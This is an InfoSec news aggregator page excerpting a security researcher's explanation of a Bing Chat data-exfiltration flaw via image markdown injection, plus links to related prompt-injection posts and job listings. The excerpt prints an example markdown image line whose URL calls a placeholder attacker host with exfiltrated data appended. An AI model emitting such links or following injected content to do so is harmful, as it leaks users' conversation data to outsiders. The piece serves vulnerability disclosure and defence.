all InfoSec news
Bing Chat: Data Exfiltration Exploit Explained
June 18, 2023, 7:01 a.m. |
Embrace The Red embracethered.com
The Vulnerability - Image Markdown Injection When Bing Chat returns text it can return markdown elements, which the client will render as HTML. This includes the feature to include images.
Imagine the LLM returns the following text:
![data exfiltration in progress](https://attacker/q=[DATA_EXFILTRATION]) This will be rendered as an HTML image …
advertisement attack bing bing chat chat client data data exfiltration exfiltrate data exfiltration explained exploit html injection injection attack malicious prompt injection return text vulnerability
More from embracethered.com / Embrace The Red
ChatGPT: Hacking Memories with Prompt Injection
1 week, 3 days ago |
embracethered.com
Pivot to the Clouds: Cookie Theft in 2024
2 weeks, 2 days ago |
embracethered.com
Bobby Tables but with LLM Apps - Google NotebookML Data Exfiltration
1 month, 2 weeks ago |
embracethered.com
HackSpaceCon 2024: Short Trip Report, Slides and Rocket Launch
1 month, 2 weeks ago |
embracethered.com
ASCII Smuggler - Improvements
2 months, 4 weeks ago |
embracethered.com
Jobs in InfoSec / Cybersecurity
CyberSOC Technical Lead
@ Integrity360 | Sandyford, Dublin, Ireland
Cyber Security Strategy Consultant
@ Capco | New York City
Cyber Security Senior Consultant
@ Capco | Chicago, IL
Sr. Product Manager
@ MixMode | Remote, US
Corporate Intern - Information Security (Year Round)
@ Associated Bank | US WI Remote
Senior Offensive Security Engineer
@ CoStar Group | US-DC Washington, DC